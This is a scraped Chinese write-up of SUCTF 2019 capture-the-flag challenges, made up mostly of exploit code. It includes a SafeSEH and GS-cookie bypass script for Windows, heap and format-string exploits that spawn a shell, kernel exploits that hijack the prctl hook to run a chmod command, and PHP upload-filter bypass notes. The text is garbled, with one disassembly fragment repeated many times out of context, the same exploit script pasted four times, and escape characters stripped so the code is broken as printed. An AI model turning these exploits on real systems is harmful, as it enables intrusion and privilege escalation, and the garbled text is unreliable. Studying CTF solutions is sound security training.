kn0ck suctf19 writeup – 安全客,安全资讯平台 | xxxkn0ck suctf19 writeup – 安全客,安全资讯平台 – xxx

kn0ck suctf19 writeup – 安全客,安全资讯平台

八月 26, 2019 - 安全客

kn0ck suctf19 writeup - 安全客,安全资讯平台






.text:00408579                 mov     esp, [ebp+ms_exc.old_esp] .text:0040857C                 call    sub_4033C8 ;这个函数里面有getflag的代码段,先想想怎么进去 发现00408579地址是异常处理函数 而在text:00408542 loc_408542:                             ; CODE XREF: sub_4083E0:loc_40853C↑p .text:00408542                 pop     eax .text:00408543                 mov     esi, [ebp+var_2C] .text:00408546                 sub     esi, eax .text:00408548                 div     esi .text:0040854A                 pop     eax .text:0040854B                 push    offset aYouCanNotFindM ; "You can not find Me!n" .text:00408550                 call    printf 




sub_402C70((int)&v11, 256, (int)v1);这个函数可以让v11溢出,可以修改返回地址,但是不能修改掉2个局部变量, 可函数退出的地方都是exit,不是正常退出,好像也无法劫持eip

.text:00408224 loc_408224:                             ; DATA XREF: .rdata:stru_47ACC0↓o .text:00408224                 mov     eax, 1 .text:00408229                 retn 

这里是个正常返回的地方,但是是在异常处理函数里面,前面有jmp直接跳过它,又不能直接运行到这里来,想想看能否触发异常来到这里. 触发异常来到这里后发现esp已经改掉了,还是无法劫持eip


根据这篇文章 绕过safeseh

from pwn import * import string t = remote('', 6666) #t = remote('', 9999)  def calc_esi(ret_addr):     ret_addr = hex(ret_addr)[2:].zfill(8)     esi = ''     for i in ret_addr:         if i in '1234567890':             esi+=chr(ord(i)+3)         elif i in string.ascii_letters:             esi+=chr(ord(i)+55)     return esi #通过第一阶段验证 print t.recvuntil('stack address = ') stack_addr = t.recvline()[2:-2] print stack_addr stack_addr = int(stack_addr,16) print t.recvuntil('main address = ') main_addr = t.recvline()[2:-2] print main_addr main_addr_num = int(main_addr,16) ret_addr = main_addr_num+0x4be3 esi = calc_esi(ret_addr) print 'esi= ',esi #esi = hex(ret_addr)[2:].zfill(8) t.sendline(esi)  #泄露seh_next print t.recvuntil('to know more?') t.sendline('yes') print t.recvuntil('do you want to know?') seh_next_addr = stack_addr-(0x19ff10-0x19fee0) print 'seh_next_addr: ',hex(seh_next_addr) t.sendline(str(seh_next_addr)) print t.recvuntil('value is 0x') seh_next = t.recvuntil('rn')[:-2] print 'seh_next: ',seh_next seh_next = int(seh_next,16)  #泄露seh_next后面的seh_handler print t.recvuntil('to know more?rn') t.sendline('yes') print t.recvuntil('do you want to know?rn') handler_addr = stack_addr-(0x19ff10-0x19fee4) print 'handler: ',hex(handler_addr) t.sendline(str(handler_addr)) print t.recvuntil('value is 0x') handler = t.recvuntil('rn')[:-2] print 'handler: ',handler handler = int(handler,16)  #泄露栈上面的gscookie print t.recvuntil('to know more?rn') t.sendline('yes') print t.recvuntil('do you want to know?rn') cookie = stack_addr-(0x19ff10-0x19fed4) print 'cookie addr: ',hex(cookie) t.sendline(str(cookie)) print t.recvuntil('value is 0x') cookie = t.recvuntil('rn')[:-2] print 'cookie: ',cookie cookie = int(cookie,16)  #泄露security cookie print t.recvuntil('to know more?rn') t.sendline('yes') print t.recvuntil('do you want to know?rn') sc = 0x47C004-0x40395e+ main_addr_num print 'sc addr: ',hex(sc) t.sendline(str(sc)) print t.recvuntil('value is ') sc = t.recvuntil('rn')[2:-2]  print 'sc: ',sc sc = int(sc,16)   #计算ebp ebp = stack_addr-(0x19ff10-0x19fef0) print 'ebp: ',hex(ebp)  #计算buf地址,计算scope指针 buf_addr = stack_addr-(0x19FF10-0x019FE44) print 'buf_addr:', hex(buf_addr) scope_addr = (buf_addr+4)^sc print 'scope_addr: ',hex(scope_addr) print t.recvuntil('to know more?rn') t.sendline('1')  ''' payload  '''  getflag_addr = main_addr_num+0x0408266-0x40395E#计算getflag地址 payload = 'aaaa' #把fake scope放在后4字节是因为之后会输入yes破坏前4字节 payload += 'xE4xFFxFFxFFx00x00x00x00x0CxFFxFFxFFx00x00x00x00xFExFFxFFxFF'+p32(getflag_addr)*2 #padding payload +='x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x31x31x31x00x32x31x32x00x00x00x00x00x00x00x00x00' payload +=p32(cookie)+'3'*8+p32(seh_next)+p32(handler)+p32(scope_addr)+p32(0)+p32(ebp)   print(len(payload)) t.sendline(payload)    print t.recvuntil('you want to know more?rn') t.sendline('yes') print t.recvuntil('n') t.sendline('111')#再次触发异常,进入getflag代码 print t.interactive() 



在linux下,使用 man malloc_useable_size 即可快速查看函数定义、用法等。

The malloc_usable_size() function returns the number of usable bytes in the block pointed to by ptr, a pointer        to a block of memory allocated by malloc(3) or a related function. 


realloc 就有意思了,按照源码,是先 malloc ,然后 memcpyfree,实测该程序并不会进行 malloc 或者 free,因为大小没改变,但是对堆块的 size 进行了检查。

然后查找漏洞,漏洞不太明显,在 perchase 函数的 scanf 函数处,例如 %8s 这样的格式化字符串,实际会写入9个字节,因为有最后一个 x00 会被写进去。




for ( i = 0; i <= 6; ++i )   buf[i] = ((buf[i] | buf[i + 1]) & ~(buf[i] & buf[i + 1]) | i) & ~((buf[i] | buf[i + 1]) & ~(buf[i] & buf[i + 1]) & i) //buf = "Qf(>qwd!" 


buf = '!' final_buf = "Qf(>qwd!" for _ in range(7):     cur = ord(buf[0])     i = 6 - _     for pre in range(256):         if ord(final_buf[i]) == ((pre | cur) & ~(pre & cur) | i) & ~((pre | cur) & ~(pre & cur) & i):             buf = chr(pre) + buf             continue  print buf # e4SyD1C! 


# from PwnContext import *  if __name__ == '__main__':             context.terminal = ['tmux', 'splitw', '-h']     #context.log_level = 'debug'     # functions for quick script     s       = lambda data               :ctx.send(str(data))        #in case that data is an int     sa      = lambda delim,data         :ctx.sendafter(str(delim), str(data))      sl      = lambda data               :ctx.sendline(str(data))      sla     = lambda delim,data         :ctx.sendlineafter(str(delim), str(data))      r       = lambda numb=4096          :ctx.recv(numb)     ru      = lambda delims, drop=True  :ctx.recvuntil(delims, drop)     irt     = lambda                    :ctx.interactive()     rs      = lambda *args, **kwargs    :ctx.start(*args, **kwargs)     dbg     = lambda gs='', **kwargs    :ctx.debug(gdbscript=gs, **kwargs)     # misc functions     uu32    = lambda data   :u32(data.ljust(4, ''))     uu64    = lambda data   :u64(data.ljust(8, ''))      ctx.binary = './pwn'     ctx.remote = ('', 10001)     #ctx.custom_lib_dir = './glibc-all-in-one/libs/2.23-0ubuntu10_i386/'     ctx.remote_libc = './'     ctx.debug_remote_libc = True       def perchase(name_len, name, price):         sla('>>>', 1)         sla('length', name_len)         sa('Name', name)         sla('Price', price)      def comment(idx, comment, score):         sla('>>>', 2)         sla('Index', idx)         sa('Comment', comment)         sla('score', score)      def throw(idx):         sla('>>>', 3)         sla('index', idx)      def rename(idx, new_name, some_fuck):         sla('>>>', 4)         sla('index', idx)         sleep(0.1)         s(new_name)         sa('power', 'yn')         sla('serial', 'e4SyD1C!')         sa('Pwner', some_fuck)      ctx.breakpoints = [0x12f2, 0x1328, 0x118f]     rs('remote')     # rs()     libc = ELF('./')     # dbg('c')      perchase(0x10, 'testn', 0) #0     comment(0, 'testcommentn', 0)     perchase(0x10, 'testn', 0) #1     throw(0)      perchase(0x10, 'testn', 0) #0     comment(0, 'a', 0)     throw(0)      ru('Comment ')     libc_leak = uu32(r(4)) & 0xffffff00      success('libc_leak = {:#x}'.format(libc_leak))     libc_base = libc_leak - 0x1b0700      # clean up     throw(1)      #     perchase(0x8c, 'an', 0) #0     perchase(0x80, 'an', 0) #1     perchase(0x40, 'an', 0) #2     perchase(0xf8, 'an', 0) #3     perchase(0x20, 'topn', 0) #4      throw(2)     # null overflow     perchase(0x44, 'a'*0x40 + p32(0x190) + 'n', 0) #2     throw(0)     # overlap     throw(3)      perchase(0x10, 'an', 0) #0     perchase(0x50, 'an', 0)      perchase(0x100, p32(0) + p32(0x31) + p32(0) + p32(0x239) + ''*0x14 + 'n', 0)       throw(0)     perchase(0x100, '/bin/shn', 0)     libc.address = libc_base     free_hook = libc.sym['__free_hook']     system = libc.sym['system']     rename(1, p32(0)*5 + p32(free_hook), p32(system))     irt() 



# from PwnContext import *  try:     from IPython import embed as ipy except ImportError:     print ('IPython not installed.')  if __name__ == '__main__':             context.terminal = ['tmux', 'splitw', '-h']     context.log_level = 'debug'     # functions for quick script     s       = lambda data               :ctx.send(str(data))        #in case that data is an int     sa      = lambda delim,data         :ctx.sendafter(str(delim), str(data))      sl      = lambda data               :ctx.sendline(str(data))      sla     = lambda delim,data         :ctx.sendlineafter(str(delim), str(data))      r       = lambda numb=4096          :ctx.recv(numb)     ru      = lambda delims, drop=True  :ctx.recvuntil(delims, drop)     irt     = lambda                    :ctx.interactive()     rs      = lambda *args, **kwargs    :ctx.start(*args, **kwargs)     dbg     = lambda gs='', **kwargs    :ctx.debug(gdbscript=gs, **kwargs)     # misc functions     uu32    = lambda data   :u32(data.ljust(4, ''))     uu64    = lambda data   :u64(data.ljust(8, ''))      ctx.binary = './playfmt'     ctx.custom_lib_dir = '/root/share/project/glibc-all-in-one/libs/2.23-0ubuntu11_i386/'     ctx.debug_remote_libc = True     ctx.remote = ('', 9999)     def fmt(payload):         sleep(0.2)         s(payload)     rs('remote')      sleep(1)     ctx.clean()     fmt('%18$x')     heap_leak = int(r(), 16)     flag_addr = heap_leak - 0x18      flag_addr_c = p32(flag_addr)      for i in range(4):         fmt('%{}c%6$hhn'.format(i+0xf0))         fmt('%{}c%14$hhn'.format(ord(flag_addr_c[i])))     fmt('%240c%6$hhn')              dbg('b *0x0804889Fnc')      sleep(1)     ctx.clean()     fmt('%6$x')     stack = int(ru(8), 16)      addup = (0xf0 - (stack & 0xff))/4      fmt('%240c%6$hhn%{}$s'.format(addup+14))     r() 




此次利用分两段完成,首先编写一个简单的leak用来泄露kernel base,然后再利用模块中的堆溢出漏洞达到任意地址写的目的,劫持prctl的hook,来调用poweroff_work_func来执行’/bin/chmod 777 /flag’


//leak.c #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <sys/types.h> #include <errno.h> #include <sys/stat.h> #include <sys/ioctl.h> #include <fcntl.h> #include <string.h> #include <pty.h> #include <sys/mman.h> #include <sys/ipc.h> #include <sys/sem.h>  #define to_kmalloc 0x73311337 #define to_kfree 0x13377331 #define to_show 0xdeadbeef  void exploit(){     char buf[0x100] = {0};     char test[] = "hello world!%lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx";     memcpy(buf,test,sizeof(test));      int fd1 = open("/dev/meizijiutql", O_RDWR);     ioctl(fd1,to_kmalloc,0x500);     write(fd1,buf,sizeof(buf));     ioctl(fd1,to_show);     ioctl(fd1,to_kfree); }   int main(int argc, char const *argv[]) {     /* code */     exploit();     return 0; } 


//exp.c #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <sys/types.h> #include <errno.h> #include <sys/stat.h> #include <sys/ioctl.h> #include <fcntl.h> #include <string.h> #include <pty.h> #include <sys/mman.h> #include <sys/ipc.h> #include <sys/sem.h>  #define to_kmalloc 0x73311337 #define to_kfree 0x13377331 #define to_show 0xdeadbeef  int main(int argc, char const *argv[]) {     unsigned long kernel_base;     puts("input kernel addr:");     scanf("%lu",&kernel_base);     kernel_base -= 0x1c827f;     unsigned long set_memory_rw = kernel_base + 0x54870;     unsigned long selinux_disable = kernel_base + 0x31ebc0;     unsigned long sbin_poweroff = kernel_base + 0x1241d40;     unsigned long security_task_prctl = kernel_base + 0x3134e0;     unsigned long hook_addr = kernel_base + 0x12934a8;     unsigned long orderly_poweroff = kernel_base + 0x81b10;     unsigned long poweroff_work_func = kernel_base + 0x82000;      printf("kernel_base = %pn", kernel_base);     printf("set_memory_rw = %pn", set_memory_rw);     printf("selinux_disable = %pn", selinux_disable);     printf("sbin_poweroff = %pn", sbin_poweroff);     printf("security_task_prctl = %pn", security_task_prctl);     printf("hook_addr = %pn", hook_addr);     printf("orderly_poweroff = %pn", orderly_poweroff);     printf("poweroff_work_func = %pn", poweroff_work_func);      int fd1 = open("/dev/meizijiutql", O_RDWR);     ioctl(fd1,to_kmalloc,0xc0);      unsigned long fake[0x19] = {0};     fake[0x18] = sbin_poweroff;     write(fd1,(char *)fake,sizeof(fake));      ioctl(fd1,to_kmalloc,0xc0);     ioctl(fd1,to_kmalloc,0xc0);//get addr      char cmd[] = "/bin/chmod 777 /flag";      write(fd1,cmd,sizeof(cmd));      ioctl(fd1,to_kmalloc,0x100);     unsigned long fake2[0x21] = {0};     fake2[0x20] = hook_addr;     write(fd1,(char *)fake2,sizeof(fake2));      ioctl(fd1,to_kmalloc,0x100);     ioctl(fd1,to_kmalloc,0x100);//get addr      unsigned long addr = sbin_poweroff;      unsigned long fake_table[4] = {0};     fake_table[3] = selinux_disable;      unsigned long *p = &fake_table;     write(fd1,&p,8);     //prctl(addr,2,addr,addr,2);//do selinux_disable      fake_table[3] = poweroff_work_func;      prctl(addr,2,addr,addr,2);//do poweroff_work_func     return 0; } 





.text:00408224 loc_408224:                             ; DATA XREF: .rdata:stru_47ACC0↓o .text:00408224                 mov     eax, 1 .text:00408229                 retn 


.text:00408224 loc_408224:                             ; DATA XREF: .rdata:stru_47ACC0↓o .text:00408224                 mov     eax, 1 .text:00408229                 retn 



这题应该算是卡的最久的了,题目给出了4组 m^n mod n = c,n的生成方式未知,已知n ,c 求解 m ,看起来像是一个RSA的解密 。与RSA相关联的是欧拉定理,根据欧拉定理可知,
m^phi(n) mod n ==1,
m^(n mod phi(n)) mod n =c

.text:00408224 loc_408224:                             ; DATA XREF: .rdata:stru_47ACC0↓o .text:00408224                 mov     eax, 1 .text:00408229                 retn 




.text:00408224 loc_408224:                             ; DATA XREF: .rdata:stru_47ACC0↓o .text:00408224                 mov     eax, 1 .text:00408229                 retn 



.text:00408224 loc_408224:                             ; DATA XREF: .rdata:stru_47ACC0↓o .text:00408224                 mov     eax, 1 .text:00408229                 retn 



题目给出 n, e, c,可以发送密文,让服务器判断相应明文是否为奇数,利⽤ RSA PARITY ORACLE⽅法,这次构造特定密文交互1024次可以求出特定明文,执行三轮,服务器返回flag,

.text:00408224 loc_408224:                             ; DATA XREF: .rdata:stru_47ACC0↓o .text:00408224                 mov     eax, 1 .text:00408229                 retn 




0x01 CheckIn





  1. .php 后缀的不可以
  2. <? 不可以出现
  3. exif_imagetype 检验是否是图片


  1. 不允许php后缀的情况下就要考虑容器的特性
  2. 不允许<? 那么就考虑<script language='php'>
  3. exif_imagetype 校验bypass


.text:00408224 loc_408224:                             ; DATA XREF: .rdata:stru_47ACC0↓o .text:00408224                 mov     eax, 1 .text:00408229                 retn 


.text:00408224 loc_408224:                             ; DATA XREF: .rdata:stru_47ACC0↓o .text:00408224                 mov     eax, 1 .text:00408229                 retn 



kn0ck suctf19 writeup - 安全客,安全资讯平台

0x02 EasyPHP




.text:00408224 loc_408224:                             ; DATA XREF: .rdata:stru_47ACC0↓o .text:00408224                 mov     eax, 1 .text:00408229                 retn 


看到源码之后思路就很明确了,get_the_flag 函数部分的上传漏洞和上题相类似,但是不同的是这里是apache环境,所以要上传的是.htaccess文件来构造解析。

关键的是第一部分,如何来让eval 函数触发get_the_flag 函数,首先判断正则过滤了那些ascii字符,写一个脚本判断一下。

.text:00408224 loc_408224:                             ; DATA XREF: .rdata:stru_47ACC0↓o .text:00408224                 mov     eax, 1 .text:00408229                 retn 



from pwn import * import string t = remote('', 6666) #t = remote('', 9999)  def calc_esi(ret_addr):     ret_addr = hex(ret_addr)[2:].zfill(8)     esi = ''     for i in ret_addr:         if i in '1234567890':             esi+=chr(ord(i)+3)         elif i in string.ascii_letters:             esi+=chr(ord(i)+55)     return esi #通过第一阶段验证 print t.recvuntil('stack address = ') stack_addr = t.recvline()[2:-2] print stack_addr stack_addr = int(stack_addr,16) print t.recvuntil('main address = ') main_addr = t.recvline()[2:-2] print main_addr main_addr_num = int(main_addr,16) ret_addr = main_addr_num+0x4be3 esi = calc_esi(ret_addr) print 'esi= ',esi #esi = hex(ret_addr)[2:].zfill(8) t.sendline(esi)  #泄露seh_next print t.recvuntil('to know more?') t.sendline('yes') print t.recvuntil('do you want to know?') seh_next_addr = stack_addr-(0x19ff10-0x19fee0) print 'seh_next_addr: ',hex(seh_next_addr) t.sendline(str(seh_next_addr)) print t.recvuntil('value is 0x') seh_next = t.recvuntil('rn')[:-2] print 'seh_next: ',seh_next seh_next = int(seh_next,16)  #泄露seh_next后面的seh_handler print t.recvuntil('to know more?rn') t.sendline('yes') print t.recvuntil('do you want to know?rn') handler_addr = stack_addr-(0x19ff10-0x19fee4) print 'handler: ',hex(handler_addr) t.sendline(str(handler_addr)) print t.recvuntil('value is 0x') handler = t.recvuntil('rn')[:-2] print 'handler: ',handler handler = int(handler,16)  #泄露栈上面的gscookie print t.recvuntil('to know more?rn') t.sendline('yes') print t.recvuntil('do you want to know?rn') cookie = stack_addr-(0x19ff10-0x19fed4) print 'cookie addr: ',hex(cookie) t.sendline(str(cookie)) print t.recvuntil('value is 0x') cookie = t.recvuntil('rn')[:-2] print 'cookie: ',cookie cookie = int(cookie,16)  #泄露security cookie print t.recvuntil('to know more?rn') t.sendline('yes') print t.recvuntil('do you want to know?rn') sc = 0x47C004-0x40395e+ main_addr_num print 'sc addr: ',hex(sc) t.sendline(str(sc)) print t.recvuntil('value is ') sc = t.recvuntil('rn')[2:-2]  print 'sc: ',sc sc = int(sc,16)   #计算ebp ebp = stack_addr-(0x19ff10-0x19fef0) print 'ebp: ',hex(ebp)  #计算buf地址,计算scope指针 buf_addr = stack_addr-(0x19FF10-0x019FE44) print 'buf_addr:', hex(buf_addr) scope_addr = (buf_addr+4)^sc print 'scope_addr: ',hex(scope_addr) print t.recvuntil('to know more?rn') t.sendline('1')  ''' payload  '''  getflag_addr = main_addr_num+0x0408266-0x40395E#计算getflag地址 payload = 'aaaa' #把fake scope放在后4字节是因为之后会输入yes破坏前4字节 payload += 'xE4xFFxFFxFFx00x00x00x00x0CxFFxFFxFFx00x00x00x00xFExFFxFFxFF'+p32(getflag_addr)*2 #padding payload +='x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x31x31x31x00x32x31x32x00x00x00x00x00x00x00x00x00' payload +=p32(cookie)+'3'*8+p32(seh_next)+p32(handler)+p32(scope_addr)+p32(0)+p32(ebp)   print(len(payload)) t.sendline(payload)    print t.recvuntil('you want to know more?rn') t.sendline('yes') print t.recvuntil('n') t.sendline('111')#再次触发异常,进入getflag代码 print t.interactive() 





from pwn import * import string t = remote('', 6666) #t = remote('', 9999)  def calc_esi(ret_addr):     ret_addr = hex(ret_addr)[2:].zfill(8)     esi = ''     for i in ret_addr:         if i in '1234567890':             esi+=chr(ord(i)+3)         elif i in string.ascii_letters:             esi+=chr(ord(i)+55)     return esi #通过第一阶段验证 print t.recvuntil('stack address = ') stack_addr = t.recvline()[2:-2] print stack_addr stack_addr = int(stack_addr,16) print t.recvuntil('main address = ') main_addr = t.recvline()[2:-2] print main_addr main_addr_num = int(main_addr,16) ret_addr = main_addr_num+0x4be3 esi = calc_esi(ret_addr) print 'esi= ',esi #esi = hex(ret_addr)[2:].zfill(8) t.sendline(esi)  #泄露seh_next print t.recvuntil('to know more?') t.sendline('yes') print t.recvuntil('do you want to know?') seh_next_addr = stack_addr-(0x19ff10-0x19fee0) print 'seh_next_addr: ',hex(seh_next_addr) t.sendline(str(seh_next_addr)) print t.recvuntil('value is 0x') seh_next = t.recvuntil('rn')[:-2] print 'seh_next: ',seh_next seh_next = int(seh_next,16)  #泄露seh_next后面的seh_handler print t.recvuntil('to know more?rn') t.sendline('yes') print t.recvuntil('do you want to know?rn') handler_addr = stack_addr-(0x19ff10-0x19fee4) print 'handler: ',hex(handler_addr) t.sendline(str(handler_addr)) print t.recvuntil('value is 0x') handler = t.recvuntil('rn')[:-2] print 'handler: ',handler handler = int(handler,16)  #泄露栈上面的gscookie print t.recvuntil('to know more?rn') t.sendline('yes') print t.recvuntil('do you want to know?rn') cookie = stack_addr-(0x19ff10-0x19fed4) print 'cookie addr: ',hex(cookie) t.sendline(str(cookie)) print t.recvuntil('value is 0x') cookie = t.recvuntil('rn')[:-2] print 'cookie: ',cookie cookie = int(cookie,16)  #泄露security cookie print t.recvuntil('to know more?rn') t.sendline('yes') print t.recvuntil('do you want to know?rn') sc = 0x47C004-0x40395e+ main_addr_num print 'sc addr: ',hex(sc) t.sendline(str(sc)) print t.recvuntil('value is ') sc = t.recvuntil('rn')[2:-2]  print 'sc: ',sc sc = int(sc,16)   #计算ebp ebp = stack_addr-(0x19ff10-0x19fef0) print 'ebp: ',hex(ebp)  #计算buf地址,计算scope指针 buf_addr = stack_addr-(0x19FF10-0x019FE44) print 'buf_addr:', hex(buf_addr) scope_addr = (buf_addr+4)^sc print 'scope_addr: ',hex(scope_addr) print t.recvuntil('to know more?rn') t.sendline('1')  ''' payload  '''  getflag_addr = main_addr_num+0x0408266-0x40395E#计算getflag地址 payload = 'aaaa' #把fake scope放在后4字节是因为之后会输入yes破坏前4字节 payload += 'xE4xFFxFFxFFx00x00x00x00x0CxFFxFFxFFx00x00x00x00xFExFFxFFxFF'+p32(getflag_addr)*2 #padding payload +='x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x31x31x31x00x32x31x32x00x00x00x00x00x00x00x00x00' payload +=p32(cookie)+'3'*8+p32(seh_next)+p32(handler)+p32(scope_addr)+p32(0)+p32(ebp)   print(len(payload)) t.sendline(payload)    print t.recvuntil('you want to know more?rn') t.sendline('yes') print t.recvuntil('n') t.sendline('111')#再次触发异常,进入getflag代码 print t.interactive() 



from pwn import * import string t = remote('', 6666) #t = remote('', 9999)  def calc_esi(ret_addr):     ret_addr = hex(ret_addr)[2:].zfill(8)     esi = ''     for i in ret_addr:         if i in '1234567890':             esi+=chr(ord(i)+3)         elif i in string.ascii_letters:             esi+=chr(ord(i)+55)     return esi #通过第一阶段验证 print t.recvuntil('stack address = ') stack_addr = t.recvline()[2:-2] print stack_addr stack_addr = int(stack_addr,16) print t.recvuntil('main address = ') main_addr = t.recvline()[2:-2] print main_addr main_addr_num = int(main_addr,16) ret_addr = main_addr_num+0x4be3 esi = calc_esi(ret_addr) print 'esi= ',esi #esi = hex(ret_addr)[2:].zfill(8) t.sendline(esi)  #泄露seh_next print t.recvuntil('to know more?') t.sendline('yes') print t.recvuntil('do you want to know?') seh_next_addr = stack_addr-(0x19ff10-0x19fee0) print 'seh_next_addr: ',hex(seh_next_addr) t.sendline(str(seh_next_addr)) print t.recvuntil('value is 0x') seh_next = t.recvuntil('rn')[:-2] print 'seh_next: ',seh_next seh_next = int(seh_next,16)  #泄露seh_next后面的seh_handler print t.recvuntil('to know more?rn') t.sendline('yes') print t.recvuntil('do you want to know?rn') handler_addr = stack_addr-(0x19ff10-0x19fee4) print 'handler: ',hex(handler_addr) t.sendline(str(handler_addr)) print t.recvuntil('value is 0x') handler = t.recvuntil('rn')[:-2] print 'handler: ',handler handler = int(handler,16)  #泄露栈上面的gscookie print t.recvuntil('to know more?rn') t.sendline('yes') print t.recvuntil('do you want to know?rn') cookie = stack_addr-(0x19ff10-0x19fed4) print 'cookie addr: ',hex(cookie) t.sendline(str(cookie)) print t.recvuntil('value is 0x') cookie = t.recvuntil('rn')[:-2] print 'cookie: ',cookie cookie = int(cookie,16)  #泄露security cookie print t.recvuntil('to know more?rn') t.sendline('yes') print t.recvuntil('do you want to know?rn') sc = 0x47C004-0x40395e+ main_addr_num print 'sc addr: ',hex(sc) t.sendline(str(sc)) print t.recvuntil('value is ') sc = t.recvuntil('rn')[2:-2]  print 'sc: ',sc sc = int(sc,16)   #计算ebp ebp = stack_addr-(0x19ff10-0x19fef0) print 'ebp: ',hex(ebp)  #计算buf地址,计算scope指针 buf_addr = stack_addr-(0x19FF10-0x019FE44) print 'buf_addr:', hex(buf_addr) scope_addr = (buf_addr+4)^sc print 'scope_addr: ',hex(scope_addr) print t.recvuntil('to know more?rn') t.sendline('1')  ''' payload  '''  getflag_addr = main_addr_num+0x0408266-0x40395E#计算getflag地址 payload = 'aaaa' #把fake scope放在后4字节是因为之后会输入yes破坏前4字节 payload += 'xE4xFFxFFxFFx00x00x00x00x0CxFFxFFxFFx00x00x00x00xFExFFxFFxFF'+p32(getflag_addr)*2 #padding payload +='x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x31x31x31x00x32x31x32x00x00x00x00x00x00x00x00x00' payload +=p32(cookie)+'3'*8+p32(seh_next)+p32(handler)+p32(scope_addr)+p32(0)+p32(ebp)   print(len(payload)) t.sendline(payload)    print t.recvuntil('you want to know more?rn') t.sendline('yes') print t.recvuntil('n') t.sendline('111')#再次触发异常,进入getflag代码 print t.interactive() 



from pwn import * import string t = remote('', 6666) #t = remote('', 9999)  def calc_esi(ret_addr):     ret_addr = hex(ret_addr)[2:].zfill(8)     esi = ''     for i in ret_addr:         if i in '1234567890':             esi+=chr(ord(i)+3)         elif i in string.ascii_letters:             esi+=chr(ord(i)+55)     return esi #通过第一阶段验证 print t.recvuntil('stack address = ') stack_addr = t.recvline()[2:-2] print stack_addr stack_addr = int(stack_addr,16) print t.recvuntil('main address = ') main_addr = t.recvline()[2:-2] print main_addr main_addr_num = int(main_addr,16) ret_addr = main_addr_num+0x4be3 esi = calc_esi(ret_addr) print 'esi= ',esi #esi = hex(ret_addr)[2:].zfill(8) t.sendline(esi)  #泄露seh_next print t.recvuntil('to know more?') t.sendline('yes') print t.recvuntil('do you want to know?') seh_next_addr = stack_addr-(0x19ff10-0x19fee0) print 'seh_next_addr: ',hex(seh_next_addr) t.sendline(str(seh_next_addr)) print t.recvuntil('value is 0x') seh_next = t.recvuntil('rn')[:-2] print 'seh_next: ',seh_next seh_next = int(seh_next,16)  #泄露seh_next后面的seh_handler print t.recvuntil('to know more?rn') t.sendline('yes') print t.recvuntil('do you want to know?rn') handler_addr = stack_addr-(0x19ff10-0x19fee4) print 'handler: ',hex(handler_addr) t.sendline(str(handler_addr)) print t.recvuntil('value is 0x') handler = t.recvuntil('rn')[:-2] print 'handler: ',handler handler = int(handler,16)  #泄露栈上面的gscookie print t.recvuntil('to know more?rn') t.sendline('yes') print t.recvuntil('do you want to know?rn') cookie = stack_addr-(0x19ff10-0x19fed4) print 'cookie addr: ',hex(cookie) t.sendline(str(cookie)) print t.recvuntil('value is 0x') cookie = t.recvuntil('rn')[:-2] print 'cookie: ',cookie cookie = int(cookie,16)  #泄露security cookie print t.recvuntil('to know more?rn') t.sendline('yes') print t.recvuntil('do you want to know?rn') sc = 0x47C004-0x40395e+ main_addr_num print 'sc addr: ',hex(sc) t.sendline(str(sc)) print t.recvuntil('value is ') sc = t.recvuntil('rn')[2:-2]  print 'sc: ',sc sc = int(sc,16)   #计算ebp ebp = stack_addr-(0x19ff10-0x19fef0) print 'ebp: ',hex(ebp)  #计算buf地址,计算scope指针 buf_addr = stack_addr-(0x19FF10-0x019FE44) print 'buf_addr:', hex(buf_addr) scope_addr = (buf_addr+4)^sc print 'scope_addr: ',hex(scope_addr) print t.recvuntil('to know more?rn') t.sendline('1')  ''' payload  '''  getflag_addr = main_addr_num+0x0408266-0x40395E#计算getflag地址 payload = 'aaaa' #把fake scope放在后4字节是因为之后会输入yes破坏前4字节 payload += 'xE4xFFxFFxFFx00x00x00x00x0CxFFxFFxFFx00x00x00x00xFExFFxFFxFF'+p32(getflag_addr)*2 #padding payload +='x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x31x31x31x00x32x31x32x00x00x00x00x00x00x00x00x00' payload +=p32(cookie)+'3'*8+p32(seh_next)+p32(handler)+p32(scope_addr)+p32(0)+p32(ebp)   print(len(payload)) t.sendline(payload)    print t.recvuntil('you want to know more?rn') t.sendline('yes') print t.recvuntil('n') t.sendline('111')#再次触发异常,进入getflag代码 print t.interactive() 



